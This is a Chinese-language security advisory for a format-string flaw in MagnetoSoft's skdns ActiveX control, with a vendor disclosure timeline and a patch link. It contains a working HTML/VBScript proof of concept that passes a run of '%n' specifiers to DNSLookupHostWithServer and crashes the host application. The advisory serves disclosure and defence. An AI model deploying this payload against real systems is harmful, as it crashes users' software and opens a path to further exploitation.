DNS ActiveX 控件(skdns.ocx) 可同时执行多个DNS查询及多个AFXR请求。

DNS ActiveX 控件的DNSLookupHostWithServer函数在实现上存在安全漏洞，成功利用后可导致受影响应用崩溃。

受影响系统：

MagnetoSoft skdns < 5.0.0.1

 

测试方法：

警  告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！<html>

<object classid=\'clsid:B5ED1577-4576-11D5-851F-00D0B7A934F6\' id=\'target\' /></object>

<script language=\'vbscript\'>

\'Magneto Software ActiveX Control ICMP Crash POC

\'Discovered by:  s4squatch

\'Site:  www.securestate.com

\'Date Discovered: 02/11/10

\'Vendor Notified: 02/02/10 --> NO RESPONSE

\'Vendor Notified: 02/11/10 --> NO RESPONSE

\'Vendor Notified: 02/17/10 --> NO RESPONSE

\'Published 04/13/10

\'www:  http://www.magnetosoft.com/products/skdns/skdns_features.htm

\'Download:  http://www.magnetosoft.com/downloads/skdns_setup.exe

\'SKNetResource.ocx

\'Function DNSLookupHostWithServer ( ByVal strHostName As String ,  ByVal strNameServer As String ) As Long

\'progid = "SKDNSLib.SKDns"

 

arg1 = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"

arg2 = "defaultV"

target.DNSLookupHostWithServer arg1 ,arg2

 

</script>

 

# Exploit-DB Note:

# According to MagnetSoft The exploit has been fixed in the latest version of the software,5.0.0.1.

# The latest version that contains the fix can be downloaded here:

# http://www.magnetosoft.com/www/downloads/win32/skdns_setup.exe

解决办法：

厂商补丁：

 

MagnetoSoft

-----------

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

 

http://www.magnetosoft.com/downloads/skdns_setup.exe

http://www.magnetosoft.com/www/downloads/win32/skdns_setup.exe